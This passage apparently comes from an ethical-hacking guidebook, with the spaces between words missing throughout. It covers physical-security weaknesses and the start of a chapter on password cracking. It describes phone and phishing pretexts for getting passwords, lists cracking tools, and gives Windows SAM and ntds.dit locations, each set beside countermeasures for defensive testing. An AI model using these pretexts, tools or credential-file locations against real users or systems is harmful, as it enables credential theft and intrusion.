StrongdoorsandlocksWindowlesswallsarounddatacentersSignagethatmakesitclearwhat’swhereandwho’sallowedAcontinuouslymonitoredalarmsystemwithnetwork-basedcameraslocatedatallaccessareasLighting(especiallyaroundentryandexitpoints)MantrapsandsallyportsthatallowonlyonepersonatatimetopassthroughadoorFences(withbarbedwireorrazorwireifneeded)
UtilitiesYoumustconsiderbuildinganddatacenterutilities,suchaspower,water,generators,andfiresuppression,whenassessingphysicalsecurity.Theseutilitiescanhelpfightoffincidentsandkeepotheraccesscontrolsrunningduringapowerloss.Youhavetobecareful,though,astheycanalsobeusedagainstyouifanintruderentersthebuilding.
AttackpointsIntrudersoftenexploitutility-relatedvulnerabilities.Considerthefollowingattackpoints,whicharecommonlyoverlooked:
Ispower-protectionequipment(surgeprotectors,uninterruptiblepowersupplies[UPSs],andgenerators)inplace?Howeasily-accessiblearetheon/offswitchesonthesedevices?Cananintruderwalkinandflipaswitch?Cananintrudersimplyscaleawoodfenceorcutoffasimplelockandaccesscriticalequipment?Whenthepowerfails,whathappenstophysicalsecuritymechanisms?Dotheyfailopen,allowinganyonethrough,orfailclosed,keepingeveryoneinoroutuntilthepowerisrestored?Wherearefire-detectionand-suppressiondevices—includingalarmsensors,extinguishers,andsprinklersystems—located?Determinehowamaliciousintrudercanabusethem.Aretheyaccessibleviaawirelessorlocalnetworkwithdefaultlogincredentials?Perhapsthey’reaccessibleovertheInternet?Arethesedevicesplacedwheretheycanharmelectronicequipmentduringafalsealarm?
Wherearewaterandgasshutoffvalveslocated?Canyouaccessthem,orwouldyouhavetocallmaintenancepersonnelwhenanincidentarises?Arelocaltelecomwires(bothcopperandfiber)thatrunoutsideofthebuildinglocatedaboveground,wheresomeonecantapintothemwithtelecomtools?Candiggingintheareacutthemeasily?Aretheylocatedontelephonepolesthatarevulnerabletotrafficaccidentsorweather-relatedincidents?
CountermeasuresYoumightneedtoinvolveoutsideexpertsduringthedesign,assessment,orretrofittingstages.Thekeyisplacement:
Ensurethatmajorutilitycontrolsareplacedbehindclosedandlockabledoorsorfencedareasoutofsighttopeoplepassingthroughornearby.EnsurethatanydevicesaccessibleoverthenetworkorInternetaretestedusingvulnerabilityscannersandothertechniquesI’veoutlinedinthisbook.Iftheydon’thavetobenetwork-orInternet-accessible,disablethatfeatureorlimitwhocanaccessthesystemsviafirewallrulesoranetworkaccesscontrollist.Ensurethatsomeonewalkingthroughornearthebuildingcannotaccessthecontrolstoturnthemonandoff.
Securitycoversforon/offswitchesandthermostatcontrolsandlocksforserverpowerbuttons,USBports,andPCIexpansionslotscanbeeffectivedefenses.Justdon’tdependonthemfully,becausesomeonewithahammer(orstrongwill)caneasilycrackthemopen.
IonceassessedthephysicalsecurityofanInternetcolocationfacilityforaverylargecomputercompany.Imadeitpastthefrontguardandtailgatedthroughallthecontrolleddoorstoreachthedatacenter.AfterIwasinside,Iwalkedbyequipmentthatwasownedbyverylargecompanies,suchasservers,routers,firewalls,UPSs,andpowercords.Allthisequipmentwascompletelyexposedtoanyonewalkinginthatarea.Aquickflipofaswitchoranaccidentaltripoveranetworkcabledanglingtothefloorcouldbringanentireshelf—andaglobale-commercesystem—totheground.
OfficelayoutandusageOfficedesignandusagecaneitherhelporhinderphysicalsecurity.
AttackpointsIntruderscanexploitvariousweaknessesaroundtheoffice.Considertheseattackpoints:
Doesareceptionistorsecurityguardmonitortrafficinandoutofthemaindoorsof
thebuilding?Doemployeeshaveconfidentialinformationontheirdesks?Whataboutmailandotherpackages—dotheyliearoundoutsidesomeone’sdooror,evenworse,outsidethebuilding,waitingforpickup?
Wherearetrashcansanddumpsterslocated?Aretheyeasily-accessiblebyanyone?Arerecyclingbinsorshreddersused?
Openrecyclingbinsandothercarelesshandlingoftrashareinvitationsfordumpsterdiving.Peoplewithillintentoftensearchforconfidentialcompanyinformationandcustomerrecordsinthetrash—andthey’reoftenverysuccessful!Dumpsterdivingcanleadtomanysecurityexposures.
Howsecurearethemailandcopyrooms?Ifintruderscanaccesstheserooms,theycanstealmailorcompanyletterheadtouseagainstyou.Theycanalsouseandabuseyourfaxmachine(s),assumingyoustillhavethose!Areclosed-circuittelevision(CCTV)orIP-basednetworkcamerasusedandmonitoredinrealtime?Ifyoursetupislessproactiveandmoreas-needed,areyouconfidentthatyou’llbeabletoquicklyaccessvideosandrelatedlogswhenyouneedthem?Haveyournetworkcamerasanddigitalvideorecorders(DVRs)beenhardenedfromattack—oratleasthavethedefaultlogincredentialsbeenchanged?Thisisasecurityflawthatyoucanpredictwithnear100-percentcertaintyonpracticallyalltypesofnetworksfrompublicutilitycompaniestohospitalstomanufacturingcompaniesandalltypesofbusinessesinbetween.
Whataccesscontrolsareondoors?Areregularkeys,cardkeys,combinationlocks,orbiometricsused?Whocanaccessthesekeys,andwherearetheystored?
Keysandprogrammablekeypadcombinationsareoftensharedamongusers,makingaccountabilitydifficulttodetermine.Findouthowmanypeoplesharethesecombinationsandkeys.
Ioncecameacrossasituationforaclientwherethefrontlobbyentrancewasunmonitored.ItalsohappenedtohaveaVoiceoverIP(VoIP)phoneavailableforanyonetouse.Buttheclientdidnotconsiderthatanyonecouldenterthelobby,disconnecttheVoIPphone(orusethephone’sdataport),andplugalaptopcomputerintotheconnectionandhavefullaccesstothenetworkwithminimalchancethattheintruderwouldeverbequestionedaboutwhatheorshewasdoing.Thistypeofsituationiseasilypreventedbydisablingnetworkconnectionsinunmonitoredareas(ifseparatedataandvoiceportsareusedorifthevoiceanddatatraffichadbeenseparatedattheswitchorphysicalnetworklevels).
CountermeasuresWhat’schallengingaboutphysicalsecurityisthefactthatsecuritycontrolsareoftenreactive.Somecontrolsarepreventive(thatis,theydeter,detect,ordelay),butthey’re
notfoolproof.Puttingsimplemeasures,suchasthefollowing,inplacecanhelpreduceyourexposuretobuildingandoffice-relatedvulnerabilities:
Areceptionistorasecurityguardwhomonitorspeoplecomingandgoing.Thisisthesimplestcountermeasure.Thispersoncanensurethateveryvisitorsignsinandthatallneworuntrustedvisitorsarealwaysescorted.
Makeitpolicyandprocedureforallemployeestoquestionstrangersandreportstrangebehaviorinthebuilding.
EmployeesOnlyorAuthorizedPersonnelOnlysignsshowthebadguyswheretheyshouldgoinsteadofdeterringthemfromentering.It’ssecuritybyobscurity,butnotcallingattentiontothecriticalareasmaybethebestapproach.
Singleentryandexitpointstoadatacenter.Secureareasfordumpsters.CCTVorIP-basedvideocamerasformonitoringcriticalareas,includingdumpsters.Cross-cutshreddersorsecurerecyclingbinsforhard-copydocuments.
Limitednumbersofkeysandpasscodecombinationsusagethat’salsologgedandmonitored.
Makekeysandpasscodesuniqueforeachpersonwheneverpossibleor,betteryet,don’tusethematall.Useelectronicbadgesthatcanbebettercontrolledandmonitoredinstead.
Biometricsidentificationsystemscanbeveryeffective,buttheycanalsobeexpensiveanddifficulttomanage.
NetworkcomponentsandcomputersAfterintrudersobtainphysicalaccesstoabuilding,theymightlookfortheserverroomandothereasily-accessiblecomputerandnetworkdevices.
AttackpointsThekeystothekingdomareoftenascloseassomeone’sdesktopcomputerandnotmuchfartherthananunsecuredcomputerroomorwiringcloset.
Intruderscandothefollowing:
Obtainnetworkaccessandsendmaliciouse-mailsasalogged-inuser.CrackandobtainpasswordsdirectlyfromthecomputerbybootingitwithatoolsuchastheophcrackLiveCD(http://ophcrack.sourceforge.net).Icoverthis
toolandmorepasswordhacksinChapter8.PlacepenetrationdropboxessuchasthosemadebyPwnieExpress(https://www.pwnieexpress.com)inastandardpoweroutlet.Thesedevicesallowamaliciousintrudertoconnectbackintothesystemviacellularconnectiontoperformtheirdirtydeeds.Thisisareallysneaky(spy-like)meansforintrusionthatyoucanuseaspartofyourownsecuritytesting.Stealfilesfromthecomputerbycopyingthemtoaremovablestoragedevice(suchasaphoneorUSBdrive)orbye-mailingthemtoanexternaladdress.Enterunlockedcomputerroomsandmessaroundwithservers,firewalls,androuters.Walkoutwithnetworkdiagrams,contactlists,anddisasterrecoveryplans.ObtainphonenumbersfromanaloglinesandcircuitIDsfromT1,MetroEthernet,andothertelecomequipmenttouseinsubsequentattacks.
Practicallyeverybitofunencryptedinformationthattraversesthenetworkcanberecordedforfutureanalysisthroughoneofthefollowingmethods:
Connectingacomputerrunningnetworkanalyzersoftware(includingatoolsuchasCainandAbelwhichIcoverinChapter9)toaswitchonyournetwork.
Installingnetworkanalyzersoftwareonanexistingcomputer.
Anetworkanalyzerisveryhardtospot.IcovernetworkanalyzerscapturingpacketsonswitchedEthernetnetworksinmoredetailinChapter9.
Howwouldsomeoneaccessorusethisinformationinthefuture?
Theeasiestattackmethodistoinstallremote-administrationsoftwareonthecomputer,suchasVNC(www.realvnc.com).AcraftyhackerwithenoughtimecanbindapublicIPaddresstothecomputerifthecomputerisoutsidethefirewall.Hackersormaliciousinsiderswithenoughnetworkknowledge(andtime)canconfigurenewfirewallrulestodothis.
Also,considertheseotherphysicalvulnerabilities:
Howeasilycancomputersbeaccessedduringregularbusinesshours?Duringlunchtime?Afterhours?Arecomputers—especiallylaptops—securedtodeskswithlocks?Aretheirharddrivesencryptedintheeventoneislostorstolen?Dotheirscreenslockafterashortperiodofnon-use?Doemployeestypicallyleavetheirphonesandtabletslyingaroundunsecured?Whataboutwhenthey’retravelingorworkingfromhome,hotels,orthelocal
coffeeshop?Arepasswordsstoredonstickynotesoncomputerscreens,keyboards,ordesks?Thisisalong-runningjokeinourcirclesbutitstillhappens!Arebackupmedialyingaroundtheofficeordatacentersusceptibletotheft?
Aresafesusedtoprotectbackupmedia?Aretheyspecificallyratedformediatokeepbackupsfrommeltingduringafire?Whocanaccessthesafe?
Safesareoftenatgreatriskbecauseoftheirsizeandvalue.Also,theyaretypicallyunprotectedbytheorganization’sregularsecuritycontrols.Arespecificpoliciesandtechnologiesinplacetohelpprotectthem?Arelockinglaptopbagsrequired?Whataboutpower-onpasswords?Encryptioncansolvealotofphysicalsecurity-relatedweaknesses.
Howeasilycansomeoneconnecttoawirelessaccesspoint(AP)signalortheAPitselftojointhenetwork?Rogueaccesspointsarealsosomethingtoconsider.IcoverwirelessnetworksinmoredetailinChapter10.Arenetworkfirewalls,routers,switches,andhubs(basically,anythingwithanEthernetconnection)easilyaccessible,whichwouldenableanattackertoplugintothenetworkeasily?
AreallcablespatchedthroughonthepatchpanelinthewiringclosetsoallnetworkdropsareliveasinthecaseoftheunmonitoredlobbyareaImentionearlier?
Thisset-upisverycommonbutabadideabecauseitallowsanyonetoplugintothenetworkanywhereandgainaccess.Thisisnotonlyagreatwaytoallowintrudersontoyournetworkbutitcanalsobeusedasameansforspreadingmalware.
CountermeasuresNetworkandcomputersecuritycountermeasuresaresomeofthesimplesttoimplementyetthemostdifficulttoenforcebecausetheyinvolvepeopleandtheireverydayactions.Here’sarundownofthesecountermeasures:
Makeyourusersawareofwhattolookoutforsoyouhaveextrasetsofeyesandearshelpingyouout.Requireuserstolocktheirscreens—whichonlytakesafewclicksorkeystrokes—whentheyleavetheircomputers.Ensurethatstrongpasswordsareused.IcoverthistopicinChapter8.Requirelaptopuserstolocktheirsystemstotheirdeskswithalockingcable.Thisisespeciallyimportantforremoteworkersandtravelersaswellasinlargercompaniesorlocationsthatreceivealotoffoottraffic.
Requirealllaptopstousefulldiskencryptiontechnologies,suchasBitLockerinWindows(ideallycombinedwithitscentralmanagementsoftwarecalledMicrosoftBitLockerAdministrationandMonitoringthatcanbefoundathttps://technet.microsoft.com/en-us/windows/hh826072.aspx)andWinMagicSecureDocFullDiskEncryption(www.winmagic.com/products/securedoc-full-disk-encryption).Keepserverroomsandwiringclosetslockedandmonitorthoseareasforanywrongdoing.Keepacurrentinventoryofhardwareandsoftwarewithintheorganizationsoit’seasytodeterminewhenextraequipmentappearsorwhenequipmentismissing.Thisisespeciallyimportantincomputerrooms.Properlysecurecomputermediawhenstoredandduringtransport.Scanforroguewirelessaccesspoints.Usecabletrapsandlocksthatpreventintrudersfromunpluggingnetworkcablesfrompatchpanelsorcomputersandusingthoseconnectionsfortheirowncomputers.Useabulkeraseronmagneticmediabeforethey’rediscarded.
PasswordsInThisChapter
Identifyingpasswordvulnerabilities
Examiningpassword-hackingtoolsandtechniques
Hackingoperatingsystempasswords
Hackingpassword-protectedfiles
Protectingyoursystemsfrompasswordhacking
Passwordhackingisoneoftheeasiestandmostcommonwaysattackersobtainunauthorizednetwork,computer,orapplicationaccess.Youoftenhearaboutitintheheadlines,andstudyafterstudysuchastheVerizonDataBreachInvestigationsReportreaffirmsthatweakpasswordsareattherootofmanysecurityproblems.IhavetroublewrappingmyheadaroundthefactthatI’mstilltalkingabout(andbusinessesaresufferingfrom)weakpasswords,butit’sareality—and,asaninformationsecuritytestingprofessional,youcancertainlydoyourparttominimizetherisks.
Althoughstrongpasswords—ideally,longerandstrongerpassphrasesthataredifficulttocrack(orguess)—areeasytocreateandmaintain,networkadministratorsandusersoftenneglectthis.Therefore,passwordsareoneoftheweakestlinksintheinformationsecuritychain.Passwordsrelyonsecrecy.Afterapasswordiscompromised,itsoriginalownerisn’ttheonlypersonwhocanaccessthesystemwithit.That’swhenaccountabilitygoesoutthewindowandbadthingsstarthappening.
Externalattackersandmaliciousinsidershavemanywaystoobtainpasswords.Theycangleanpasswordssimplybyaskingforthemorbylookingovertheshouldersofusers(shouldersurfing)whiletheytypetheirpasswords.Hackerscanalsoobtainpasswordsfromlocalcomputersbyusingpassword-crackingsoftware.Toobtainpasswordsfromacrossanetwork,attackerscanuseremotecrackingutilities,keyloggers,ornetworkanalyzers.
Thischapterdemonstrateshoweasilythebadguyscangatherpasswordinformationfromyournetworkandcomputersystems.Ioutlinecommonpasswordvulnerabilitiesanddescribecountermeasurestohelppreventthesevulnerabilitiesfrombeingexploitedonyoursystems.Ifyouperformthetestsandimplementthecountermeasuresoutlinedinthischapter,you’llbewellonyourwaytosecuringyoursystems’passwords.
UnderstandingPasswordVulnerabilitiesWhenyoubalancethecostofsecurityandthevalueoftheprotectedinformation,thecombinationofauserIDandasecretpasswordisusuallyadequate.However,passwordsgiveafalsesenseofsecurity.Thebadguysknowthisandattempttocrackpasswordsasasteptowardbreakingintocomputersystems.
Onebigproblemwithrelyingsolelyonpasswordsforsecurityisthatmorethanonepersoncanknowthem.Sometimes,thisisintentional;often,it’snot.Thetoughpartisthatthere’snowayofknowingwho,besidesthepassword’sowner,knowsapassword.
Rememberthatknowingapassworddoesn’tmakesomeoneanauthorizeduser.
Herearethetwogeneraltypesofpasswordvulnerabilities:
Organizationaloruservulnerabilities:Thisincludeslackofpasswordpoliciesthatareenforcedwithintheorganizationandlackofsecurityawarenessonthepartofusers.Technicalvulnerabilities:Thisincludesweakencryptionmethodsandunsecurestorageofpasswordsoncomputersystems.
Iexploreeachoftheseclassificationsinmoredetailinthefollowingsections.
BeforecomputernetworksandtheInternet,theuser’sphysicalenvironmentwasanadditionallayerofpasswordsecuritythatactuallyworkedprettywell.Nowthatmostcomputershavenetworkconnectivity,thatprotectionisgone.RefertoChapter7fordetailsonmanagingphysicalsecurityinthisageofnetworkedcomputersandmobiledevices.
OrganizationalpasswordvulnerabilitiesIt’shumannaturetowantconvenience,especiallywhenitcomestorememberingfive,ten,andoftendozensofpasswordsforworkanddailylife.Thisdesireforconveniencemakespasswordsoneoftheeasiestbarriersforanattackertoovercome.Almost3trillion(yes,trillionwithatand12zeros)eight-characterpasswordcombinationsarepossiblebyusingthe26lettersofthealphabetandthenumerals0through9.Thekeystostrongpasswordsare:1)easytorememberand2)difficulttocrack.However,mostpeoplejustfocusontheeasy-to-rememberpart.Usersliketousesuchpasswordsaspassword,theirloginname,abc123,ornopasswordatall!Don’tlaugh;I’veseentheseblatantweaknessesandguaranteethey’reonanygivennetworkthisverymoment.
Unlessusersareeducatedandremindedaboutusingstrongpasswords,theirpasswordsusuallyare
Easytoguess.
Seldomchanged.
Reusedformanysecuritypoints.Whenbadguyscrackonepassword,theycanoftenaccessothersystemswiththatsamepasswordandusername.
Usingthesamepasswordacrossmultiplesystemsandwebsitesisnothingbutabreachwaitingtohappen.Everyoneisguiltyofit,butthatdoesn’tmakeitright.Dowhatyoucantoprotectyourowncredentialsandspreadthewordtoyourusersabouthowthispracticecangetyouintoarealbind.
Writtendowninunsecureplaces.Generally,themorecomplexapasswordis,themoredifficultitistocrack.However,whenuserscreatecomplexpasswords,they’remorelikelytowritethemdown.Externalattackersandmaliciousinsiderscanfindthesepasswordsandusethemagainstyouandyourbusiness.
TechnicalpasswordvulnerabilitiesYoucanoftenfindtheseserioustechnicalvulnerabilitiesafterexploitingorganizationalpasswordvulnerabilities:
Weakpasswordencryptionschemes.HackerscanbreakweakpasswordstoragemechanismsbyusingcrackingmethodsthatIoutlineinthischapter.Manyvendorsanddevelopersbelievethatpasswordsaresafeaslongastheydon’tpublishthesourcecodefortheirencryptionalgorithms.Wrong!Apersistent,patientattackercanusuallycrackthissecuritybyobscurity(asecuritymeasurethat’shiddenfromplainviewbutcanbeeasilyovercome)fairlyquickly.Afterthecodeiscracked,itisdistributedacrosstheInternetandbecomespublicknowledge.
Passwordcrackingutilitiestakeadvantageofweakpasswordencryption.Theseutilitiesdothegruntworkandcancrackanypassword,givenenoughtimeandcomputingpower.
Programsthatstoretheirpasswordsinmemory,unsecuredfiles,andeasilyaccesseddatabases.Unencrypteddatabasesthatprovidedirectaccesstosensitiveinformationtoanyonewithdatabaseaccess,regardlessofwhethertheyhaveabusinessneedtoknow.Userapplicationsthatdisplaypasswordsonthescreenwhiletheuseristyping.
TheNationalVulnerabilityDatabase(anindexofcomputervulnerabilitiesmanagedbytheNationalInstituteofStandardsandTechnology)currentlyidentifiesover2,300password-relatedvulnerabilities!Youcansearchfortheseissuesathttp://nvd.nist.govtofindouthowvulnerablesomeofyoursystemsarefromatechnicalperspective.
CrackingPasswordsPasswordcrackingisoneofthemostenjoyablehacksforthebadguys.Itfuelstheirsenseofexplorationanddesiretofigureoutaproblem.Youmightnothaveaburningdesiretoexploreeveryone’spasswords,butithelpstoapproachpasswordcrackingwiththismindset.Sowhereshouldyoustarttestingthepasswordsonyoursystems?Generally,anyuser’spasswordworks.Afteryouobtainonepassword,youcanoftenobtainothers—includingadministratororrootpasswords.
Administratorpasswordsarethepotofgold.Withunauthorizedadministrativeaccess,you(oracriminalhacker)candovirtuallyanythingonthesystem.Whenlookingforyourorganization’spasswordvulnerabilities,Irecommendfirsttryingtoobtainthehighestlevelofaccesspossible(suchasadministrator)throughthemostdiscreetmethodpossible.That’softenwhatthecriminalsdo.
Youcanuselow-techwaysandhigh-techwaystoexploitvulnerabilitiestoobtainpasswords.Forexample,youcandeceiveusersintodivulgingpasswordsoverthetelephoneorsimplyobservewhatauserhaswrittendownonapieceofpaper.Oryoucancapturepasswordsdirectlyfromacomputer,overanetwork,andviatheInternetwiththetoolscoveredinthefollowingsections.
Crackingpasswordstheold-fashionedwayAhackercanuselow-techmethodstocrackpasswords.Thesemethodsincludeusingsocialengineeringtechniquessuchasphishing,shouldersurfing,andsimplyguessingpasswordsfrominformationthatheknowsabouttheuser.
SocialengineeringThemostpopularlow-techmethodforgatheringpasswordsissocialengineering,whichIcoverindetailinChapter6.Socialengineeringtakesadvantageofthetrustingnatureofhumanbeingstogaininformationthatlatercanbeusedmaliciously.Acommonsocialengineeringtechniqueissimplytoconpeopleintodivulgingtheirpasswords.Itsoundsridiculous,butithappensallthetime.
Techniques
Toobtainapasswordthroughsocialengineering,youjustaskforit.Forexample,youcansimplycallauserandtellhimthathehassomeimportant-lookinge-mailsstuckinthemailqueue,andyouneedhispasswordtologinandfreethemup.Thisisoftenhowhackersandrogueinsiderstrytogettheinformation!
Anotherwaytogetuserstodivulgetheirpasswordsistosendaphishinge-mailsimplyrequestingthatinformation.Ihavefoundthataskinguserstoconfirmtheirunderstandingandcompliancewithinternalsecuritypoliciesbysubmittingtheirlogincredentialstoaphishingwebsiteisallittakes.Icovere-mailphishingingreaterdetailinChapter6.
Ifusersgiveyoutheirpasswordsduringyourtesting,makesurethatthosepasswordsarechanged.AneasywaytodothisistoforcepasswordchangesforallusersthroughtheWindowsdomain.Youdon’twanttobeheldaccountableifsomethinggoesawryafterthepasswordhasbeendisclosed.
Acommonweaknessthatcanfacilitatesuchsocialengineeringiswhenstaffmembers’names,phonenumbers,ande-mailaddressesarepostedonyourcompanywebsite.SocialmediasitessuchasLinkedIn,Facebook,andTwittercanalsobeusedagainstacompanybecausethesesitescanrevealemployees’namesandcontactinformation.
Countermeasures
Userawarenessandconsistentsecuritytrainingaregreatdefensesagainstsocialengineering.Securitytoolsareagoodfail-safeiftheymonitorforsuche-mailsandwebbrowsingatthehost-level,networkperimeter,orinthecloud.Trainuserstospotattacks(suchassuspiciousphonecallsordeceitfulphishinge-mails)andrespondeffectively.Theirbestresponseisnottogiveoutanyinformationandtoalerttheappropriateinformationsecuritymanagerintheorganizationtoseewhethertheinquiryislegitimateandwhetheraresponseisnecessary.Oh,andtakethatstaffdirectoryoffyourwebsiteoratleastremoveITstaffmembers’information.
ShouldersurfingShouldersurfing(theactoflookingoversomeone’sshouldertoseewhatthepersonistyping)isaneffective,low-techpasswordhack.
Techniques
Tomountthisattack,thebadguysmustbeneartheirvictimsandnotlookobvious.Theysimplycollectthepasswordbywatchingeithertheuser’skeyboardorscreenwhenthepersonlogsin.Anattackerwithagoodeyemightevenwatchwhethertheuserisglancingaroundhisdeskforeitherareminderofthepasswordorthepassworditself.Securitycamerasorawebcamcanevenbeusedforsuchattacks.Coffeeshopsandairplanesprovidetheidealscenariosforshouldersurfing.
Youcantryshouldersurfingyourself.Simplywalkaroundtheofficeandperformrandomspotchecks.Gotousers’desksandaskthemtologintotheircomputers,thenetwork,oreventheire-mailapplications.Justdon’ttellthemwhatyou’redoingbeforehand,ortheymightattempttohidewhatthey’retypingorwherethey’relookingfortheirpassword—twothingsthattheyshould’vebeendoingallalong!Justbecarefuldoingthisandrespectotherpeople’sprivacy.
Countermeasures
Encourageuserstobeawareoftheirsurroundingsandnottoentertheirpasswordswhentheysuspectthatsomeoneislookingovertheirshoulders.Instructusersthatiftheysuspectsomeoneislookingovertheirshoulderswhilethey’reloggingin,theyshouldpolitelyaskthepersontolookawayor,whennecessary,hurlanappropriate
epithettoshowtheoffenderthattheuserisserious.It’softeneasiesttojustleanintotheshouldersurfer’slineofsighttokeepthemfromseeinganytypingand/orthecomputerscreen.3MPrivacyFilters(www.shop3m.com/3m-privacy-filters.html)workgreataswellyet,surprisingly,Irarelyseethembeingused.
InferenceInferenceissimplyguessingpasswordsfrominformationyouknowaboutusers—suchastheirdateofbirth,favoritetelevisionshow,orphonenumbers.Itsoundssilly,butcriminalsoftendeterminetheirvictims’passwordssimplybyguessingthem!
Thebestdefenseagainstaninferenceattackistoeducateusersaboutcreatingsecurepasswordsthatdon’tincludeinformationthatcanbeassociatedwiththem.Outsideofcertainpasswordcomplexityfilters,it’softennoteasytoenforcethispracticewithtechnicalcontrols.So,youneedasoundsecuritypolicyandongoingsecurityawarenessandtrainingtoremindusersoftheimportanceofsecurepasswordcreation.
WeakauthenticationExternalattackersandmaliciousinsiderscanobtain—orsimplyavoidhavingtouse—passwordsbytakingadvantageofolderorunsecuredoperatingsystemsthatdon’trequirepasswordstologin.Thesamegoesforaphoneortabletthatisn’tconfiguredtousepasswords.
Bypassingauthentication
Onolderoperatingsystems(suchasWindows9x)thatpromptforapassword,youcanpressEsconthekeyboardtogetrightin.Okay,it’shardtofindanyWindows9xsystemsthesedays,butthesamegoesforanyoperatingsystem—oldornew—that’sconfiguredtobypasstheloginscreen.Afteryou’rein,youcanfindotherpasswordsstoredinsuchplacesasdialupandVPNconnectionsandscreensavers.SuchpasswordscanbecrackedveryeasilyusingElcomSoft’sProactiveSystemPasswordRecoverytool(www.elcomsoft.com/pspr.html)andCain&Abel(www.oxid.it/cain.html).Theseweaksystemscanserveastrustedmachines—meaningthatpeopleassumethey’resecure—andprovidegoodlaunchingpadsfornetwork-basedpasswordattacksaswell.
Countermeasures
Theonlytruedefenseagainstweakauthenticationistoensureyouroperatingsystemsrequireapassworduponboot.Toeliminatethisvulnerability,atleastupgradetoWindows7,ifnotWindows10,orusethemostrecentversionsofLinuxoroneofthevariousflavorsofUNIX,includingMacOSXandChromeOS.
Currentauthenticationsystems,suchasKerberos(whichisusedinnewerversionsofWindows)anddirectoryservices(suchasMicrosoft’sActiveDirectory),encryptuserpasswordsordon’tcommunicatethepasswordsacrossthenetworkatall,whichcreatesanextralayerofsecurity.
Crackingpasswordswithhigh-techtoolsHigh-techpasswordcrackinginvolvesusingaprogramthattriestoguessapasswordbydeterminingallpossiblepasswordcombinations.Thesehigh-techmethodsaremostlyautomatedafteryouaccessthecomputerandpassworddatabasefiles.
Themainpassword-crackingmethodsaredictionaryattacks,brute-forceattacks,andrainbowattacks.Youfindouthoweachoftheseworkinthefollowingsections.
Password-crackingsoftwareYoucantrytocrackyourorganization’soperatingsystemandapplicationpasswordswithvariouspassword-crackingtools:
Brutus(www.hoobie.net/brutus)crackslogonsforHTTP,FTP,telnet,andmore.Cain&Abel(www.oxid.it/cain.html)cracksLMandNTLanManager(NTLM)hashes,WindowsRDPpasswords,CiscoIOSandPIXhashes,VNCpasswords,RADIUShashes,andlotsmore.(Hashesarecryptographicrepresentationsofpasswords.)ElcomSoftDistributedPasswordRecovery(www.elcomsoft.com/edpr.html)cracksWindows,MicrosoftOffice,PGP,Adobe,iTunes,andnumerousotherpasswordsinadistributedfashionusingupto10,000networkedcomputersatonetime.Plus,thistoolusesthesamegraphicsprocessingunit(GPU)videoaccelerationastheElcomSoftWirelessAuditortool,whichallowsforcrackingspeedsupto50timesfaster.(ItalkabouttheElcomSoftWirelessAuditortoolinChapter10.)ElcomSoftSystemRecovery(www.elcomsoft.com/esr.html)cracksorresetsWindowsuserpasswords,setsadministrativerights,andresetspasswordexpirationsallfromabootableCD.Thisisagreattoolfordemonstratingwhatcanhappenwhenlaptopcomputersdonothavefulldiskencryption.JohntheRipper(www.openwall.com/john)crackshashedLinux/UNIXandWindowspasswords.ophcrack(http://ophcrack.sourceforge.net)cracksWindowsuserpasswordsusingrainbowtablesfromabootableCD.Rainbowtablesarepre-calculatedpasswordhashesthatcanhelpspeedupthecrackingprocessbycomparingthesehasheswiththehashesobtainedfromthespecificpasswordsbeingtested.ProactivePasswordAuditor(www.elcomsoft.com/ppa.html)runsbrute-force,dictionary,andrainbowcracksagainstextractedLMandNTLMpasswordhashes.ProactiveSystemPasswordRecovery(www.elcomsoft.com/pspr.html)recoverspracticallyanylocallystoredWindowspassword,suchaslogonpasswords,WEP/WPApassphrases,SYSKEYpasswords,andRAS/dialup/VPNpasswords.pwdump3(www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003-vista-7)extractsWindowspasswordhashesfromtheSAM(Security
AccountsManager)database.RainbowCrack(http://project-rainbowcrack.com)cracksLanManager(LM)andMD5hashesveryquicklybyusingrainbowtables.THC-Hydra(www.thc.org/thc-hydra)crackslogonsforHTTP,FTP,IMAP,SMTP,VNCandmanymore.
Someofthesetoolsrequirephysicalaccesstothesystemsyou’retesting.Youmightbewonderingwhatvaluethataddstopasswordcracking.Ifahackercanobtainphysicalaccesstoyoursystemsandpasswordfiles,youhavemorethanjustbasicinformationsecurityproblemstoworryabout,right?True,butthiskindofaccessisentirelypossible!Whataboutasummerintern,adisgruntledemployee,oranoutsideauditorwithmaliciousintent?Themereriskofanunencryptedlaptopbeinglostorstolenandfallingintothehandsofsomeonewithillintentshouldbereasonenough.
Tounderstandhowtheprecedingpassword-crackingprogramsgenerallywork,youfirstneedtounderstandhowpasswordsareencrypted.Passwordsaretypicallyencryptedwhenthey’restoredonacomputer,usinganencryptionorone-wayhashalgorithm,suchasSHA2orMD5.Hashedpasswordsarethenrepresentedasfixed-lengthencryptedstringsthatalwaysrepresentthesamepasswordswithexactlythesamestrings.Thesehashesareirreversibleforallpracticalpurposes,so,intheory,passwordscanneverbedecrypted.Furthermore,certainpasswords,suchasthoseinLinux,havearandomvaluecalledasaltaddedtothemtocreateadegreeofrandomness.Thispreventsthesamepasswordusedbytwopeoplefromhavingthesamehashvalue.
Password-crackingutilitiestakeasetofknownpasswordsandrunthemthroughapassword-hashingalgorithm.Theresultingencryptedhashesarethencomparedatlightningspeedtothepasswordhashesextractedfromtheoriginalpassworddatabase.Whenamatchisfoundbetweenthenewlygeneratedhashandthehashintheoriginaldatabase,thepasswordhasbeencracked.It’sthatsimple.
Otherpassword-crackingprogramssimplyattempttologonusingapredefinedsetofuserIDsandpasswords.Thisishowmanydictionary-basedcrackingtoolswork,suchasBrutus(www.hoobie.net/brutus)andSQLPing3(www.sqlsecurity.com/downloads).IcovercrackingwebapplicationanddatabasepasswordsinChapters15and16.
Passwordsthataresubjectedtocrackingtoolseventuallylose.Youhaveaccesstothesametoolsasthebadguys.Thesetoolscanbeusedforbothlegitimatesecurityassessmentsandmaliciousattacks.Youwanttofindpasswordweaknessesbeforethebadguysdo,andinthissection,IshowyousomeofmyfavoritemethodsforassessingWindowsandLinux/UNIXpasswords.
Whentryingtocrackpasswords,theassociateduseraccountsmightbelockedout,whichcouldinterruptyourusers.Becarefulifintruderlockoutisenabledinyouroperatingsystems,databases,orapplications.Iflockoutisenabled,youmightlockoutsomeorallcomputer/networkaccounts,resultinginadenialofservicesituationforyourusers.
Passwordstoragelocationsvarybyoperatingsystem:
Windowsusuallystorespasswordsintheselocations:
SecurityAccountsManager(SAM)database(c:\windows\system32\config)ActiveDirectorydatabasefilethat’sstoredlocallyorspreadacrossdomaincontrollers(ntds.dit)
WindowsmayalsostorepasswordsinabackupoftheSAMfileinthec:\winnt\repairorc:\windows\repairdirectory.
